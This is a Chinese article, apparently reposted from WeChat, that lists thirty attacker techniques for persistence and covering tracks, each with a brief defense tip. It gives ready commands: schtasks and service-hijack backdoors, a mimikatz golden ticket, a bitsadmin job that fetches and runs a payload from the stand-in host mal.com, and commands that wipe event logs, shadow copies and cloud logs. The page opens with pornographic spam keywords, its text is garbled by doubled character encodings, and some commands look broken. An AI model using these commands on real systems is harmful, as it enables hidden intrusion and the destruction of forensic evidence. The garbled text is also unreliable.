日韩欧美人妻无码精品白浆,www.大香蕉久久网,狠狠的日狠狠的操,日本好好热在线观看

在攻防對(duì)抗中，內(nèi)網(wǎng)橫向移動(dòng)后的權(quán)限維持與痕跡清理是決定攻擊能否長(zhǎng)期隱蔽的關(guān)鍵環(huán)節(jié)。本文將系統(tǒng)解析30種高價(jià)值技巧，覆蓋Windows/Linux系統(tǒng)、域環(huán)境及常見(jiàn)服務(wù)，并提供對(duì)應(yīng)的防御視角建議。

第一部分：權(quán)限維持15則

1. 1. 計(jì)劃任務(wù)偽裝
• ? 技術(shù)點(diǎn)：通過(guò)schtasks創(chuàng)建名稱(chēng)類(lèi)似系統(tǒng)服務(wù)（如MicrosoftEdgeUpdate）的定時(shí)任務(wù)，觸發(fā)后門(mén)執(zhí)行。
• ? 操作：schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:\malware.exe" /sc hourly
• ? 防御：監(jiān)控計(jì)劃任務(wù)中非微軟簽名的程序路徑。
2. 2. 服務(wù)注入
• ? 技術(shù)點(diǎn)：劫持合法服務(wù)（如Print Spooler）的二進(jìn)制路徑指向惡意負(fù)載。
• ? 操作：sc config spooler binPath= "C:\Windows\System32\mal.dll"
• ? 防御：?jiǎn)⒂梅?wù)簽名驗(yàn)證（RequireSignedServiceBinaries）。
3. 3. 注冊(cè)表自啟動(dòng)項(xiàng)
• ? 技術(shù)點(diǎn)：修改HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM對(duì)應(yīng)項(xiàng)。
• ? 隱蔽性：使用CLSID混淆鍵名（如{AB3D1234-...}）。
• ? 防御：部署注冊(cè)表變更告警規(guī)則。
4. 4. 啟動(dòng)文件夾植入
• ? 技術(shù)點(diǎn)：將惡意快捷方式（.lnk）放入%AppData%\Microsoft\Windows\Start Menu\Programs\Startup。
• ? 繞過(guò)：利用.url文件偽裝為合法文檔。
• ? 防御：限制用戶(hù)目錄寫(xiě)入權(quán)限。
5. 5. WMI事件訂閱
• ? 技術(shù)點(diǎn)：注冊(cè)WMI事件過(guò)濾器（如用戶(hù)登錄觸發(fā)后門(mén)）。
• ? 腳本：

  $filterArgs = @{ EventNamespace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" }  
  $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }  

• ? 防御：定期審計(jì)__EventFilter/__EventConsumer類(lèi)。
6. 6. 影子賬戶(hù)創(chuàng)建
• ? 技術(shù)點(diǎn)：通過(guò)注冊(cè)表添加隱藏賬戶(hù)（F值修改為0x3e9）。
• ? 操作：

  reg add "HKLM\SAM\SAM\Domains\Account\Users\000003E9" /v F /t REG_BINARY /d ...  

• ? 防御：檢查SAM中用戶(hù)RID是否連續(xù)。
7. 7. 黃金票據(jù)（Golden Ticket）
• ? 技術(shù)點(diǎn)：利用域控的KRBTGT哈希偽造TGT票據(jù)。
• ? 生成：

  kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt  

• ? 防御：定期重置KRBTGT密碼（每180天）。
8. 8. ACL后門(mén)
• ? 技術(shù)點(diǎn)：為關(guān)鍵進(jìn)程（如LSASS.exe）添加調(diào)試權(quán)限。
• ? 操作：

  Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow  

• ? 防御：監(jiān)控敏感進(jìn)程的ACL變更。
9. 9. DLL劫持
• ? 技術(shù)點(diǎn)：替換系統(tǒng)目錄（如C:\Windows\System32\）中未簽名的DLL。
• ? 優(yōu)先級(jí)：利用DLL搜索順序劫持應(yīng)用程序。
• ? 防御：?jiǎn)⒂肈LL簽名強(qiáng)制驗(yàn)證（CIG功能）。
10. 10. RID劫持攻擊
• ? 技術(shù)點(diǎn)：修改低權(quán)限用戶(hù)的RID為500（管理員RID）。
• ? 操作：通過(guò)mimikatz調(diào)整注冊(cè)表F字段。
• ? 防御：檢查用戶(hù)SID與RID的合法性。
11. 11. COM劫持
• ? 技術(shù)點(diǎn)：注冊(cè)惡意COM組件劫持MMC或Office調(diào)用鏈。
• ? 注冊(cè)表路徑：HKCR\CLSID\{...}\InprocServer32
• ? 防御：禁用未簽名的COM組件加載。
12. 12. Hook注入（API Hooking）
• ? 技術(shù)點(diǎn)：注入WS2_32.dll的connect函數(shù)實(shí)現(xiàn)網(wǎng)絡(luò)通信重定向。
• ? 工具：使用Detours庫(kù)實(shí)現(xiàn)函數(shù)劫持。
• ? 防御：?jiǎn)⒂抿?qū)動(dòng)簽名驗(yàn)證（DSE）。
13. 13. Bits Jobs持久化
• ? 技術(shù)點(diǎn)：利用后臺(tái)智能傳輸服務(wù)（BITS）下載惡意負(fù)載。
• ? 命令：

  bitsadmin /create backdoor  
  bitsadmin /addfile backdoor http://mal.com/payload.exe C:\temp\svchost.exe  
  bitsadmin /SetNotifyCmdLine backdoor C:\temp\svchost.exe NULL  

• ? 防御：審核BITS任務(wù)列表。
14. 14. 域信任關(guān)系濫用
• ? 技術(shù)點(diǎn)：在跨域信任場(chǎng)景中利用SID History屬性提權(quán)。
• ? 操作：使用mimikatz添加域控的SID至用戶(hù)屬性。
• ? 防御：禁用不必要的域信任關(guān)系。
15. 15. Office宏持久化
• ? 技術(shù)點(diǎn)：在Normal.dotm模板中嵌入惡意宏代碼。
• ? 觸發(fā)：用戶(hù)啟動(dòng)Word時(shí)自動(dòng)執(zhí)行。
• ? 防御：?jiǎn)⒂煤陥?zhí)行限制（僅允許簽名宏）。

第二部分：痕跡清理15則

1. 16. Windows事件日志清除
• ? 工具：wevtutil cl Security（需管理員權(quán)限）。
• ? 對(duì)抗：使用內(nèi)存注入技術(shù)直接操作eventlog.service進(jìn)程。
• ? 防御：?jiǎn)⒂萌罩巨D(zhuǎn)發(fā)至SIEM系統(tǒng)。
2. 17. IIS日志擦除
• ? 路徑：C:\inetpub\logs\LogFiles\W3SVC1\。
• ? 技巧：僅刪除特定時(shí)間段的日志條目（避免全量刪除引發(fā)懷疑）。
• ? 防御：配置日志文件ACL為只讀。
3. 18. 防火墻規(guī)則恢復(fù)
• ? 操作：刪除新增的放行規(guī)則（netsh advfirewall firewall delete rule name="mal_rule"）。
• ? 隱蔽：復(fù)用已有規(guī)則名稱(chēng)（如Remote Desktop）。
• ? 防御：基線化防火墻規(guī)則并監(jiān)控變更。
4. 19. 文件時(shí)間戳偽造
• ? 工具：timestomp.exe -m "01/01/2020 08:00:00" malware.exe。
• ? 匹配：將時(shí)間戳與系統(tǒng)文件（如notepad.exe）保持一致。
• ? 防御：?jiǎn)⒂梦募暾员O(jiān)控（FIM）。
5. 20. 內(nèi)存痕跡清除
• ? 技術(shù)點(diǎn)：卸載惡意驅(qū)動(dòng)后調(diào)用ExAllocatePool覆蓋內(nèi)存區(qū)域。
• ? 工具：使用BOF（Beacon Object Files）實(shí)現(xiàn)無(wú)文件擦除。
• ? 防御：部署內(nèi)存掃描工具（如Elastic Endpoint）。
6. 21. 回收站繞過(guò)刪除
• ? 命令：del /f /q /s *.*配合shift+delete徹底清除。
• ? 增強(qiáng)：使用cipher /w:C:覆寫(xiě)磁盤(pán)空閑空間。
• ? 防御：審計(jì)敏感目錄的文件刪除操作。
7. 22. 預(yù)讀取文件清理
• ? 路徑：C:\Windows\Prefetch\中.pf文件。
• ? 操作：定期執(zhí)行del /f /q C:\Windows\Prefetch\*.pf。
• ? 防御：禁用預(yù)讀取功能（需評(píng)估性能影響）。
8. 23. 卷影副本刪除
• ? 命令：vssadmin delete shadows /all /quiet。
• ? 對(duì)抗：在提權(quán)后優(yōu)先刪除卷影防止取證恢復(fù)。
• ? 防御：限制vssadmin執(zhí)行權(quán)限。
9. 24. RDP連接記錄清除
• ? 注冊(cè)表路徑：HKCU\Software\Microsoft\Terminal Server Client\Servers。
• ? 自動(dòng)化：編寫(xiě)腳本批量刪除歷史IP記錄。
• ? 防御：?jiǎn)⒂肦DP連接日志審計(jì)。
10. 25. 瀏覽器歷史痕跡清理
• ? 工具：使用BrowsingHistoryView導(dǎo)出并刪除Chrome/Firefox記錄。
• ? 進(jìn)階：劫持瀏覽器擴(kuò)展自動(dòng)清理歷史（如惡意插件）。
• ? 防御：監(jiān)控瀏覽器進(jìn)程的異常行為。
11. 26. PowerShell日志繞過(guò)
• ? 技術(shù)點(diǎn)：通過(guò)-WindowStyle Hidden -ExecutionPolicy Bypass隱藏執(zhí)行窗口。
• ? 日志清除：刪除Microsoft-Windows-PowerShell%4Operational.evtx。
• ? 防御：?jiǎn)⒂媚K日志記錄（ScriptBlockLogging）。
12. 27. WMI日志清理
• ? 路徑：Applications and Services Logs\Microsoft\Windows\WMI-Activity。
• ? 難點(diǎn)：需停止Winmgmt服務(wù)后操作日志文件。
• ? 防御：?jiǎn)⒂肳MI活動(dòng)審計(jì)策略。
13. 28. Linux utmp/wtmp清理
• ? 文件：/var/run/utmp、/var/log/wtmp。
• ? 命令：使用utmpdump工具編輯登錄記錄。
• ? 防御：配置ttylog實(shí)時(shí)記錄會(huì)話內(nèi)容。
14. 29. 數(shù)據(jù)庫(kù)日志截?cái)?/span>
• ? MySQL：PURGE BINARY LOGS BEFORE '2024-01-01';
• ? MSSQL：執(zhí)行EXEC sp_cycle_errorlog;循環(huán)日志文件。
• ? 防御：?jiǎn)⒂脭?shù)據(jù)庫(kù)審計(jì)并異地存儲(chǔ)日志。
15. 30. 云平臺(tái)日志覆蓋
• ? AWS：通過(guò)DeleteLogGroup刪除CloudTrail日志組。
• ? Azure：使用Remove-AzLogProfile清除活動(dòng)日志配置。
• ? 防御：?jiǎn)⒂迷迫罩静豢勺冃裕↖mmutable Storage）。

防御方建議

• ? 權(quán)限維持檢測(cè)：部署EDR監(jiān)控進(jìn)程樹(shù)異常、注冊(cè)表關(guān)鍵路徑變更及服務(wù)簽名異常。
• ? 痕跡清理對(duì)抗：實(shí)施日志多副本存儲(chǔ)（本地+云端+物理設(shè)備），使用AI分析日志完整性。
• ? 紅隊(duì)驗(yàn)證：定期模擬攻擊驗(yàn)證防御體系有效性，重點(diǎn)關(guān)注上述30項(xiàng)技術(shù)的防護(hù)盲區(qū)。

閱讀原文：https://mp.weixin.qq.com/s/KHNbBR3WAjDGaLGvRZoUwQ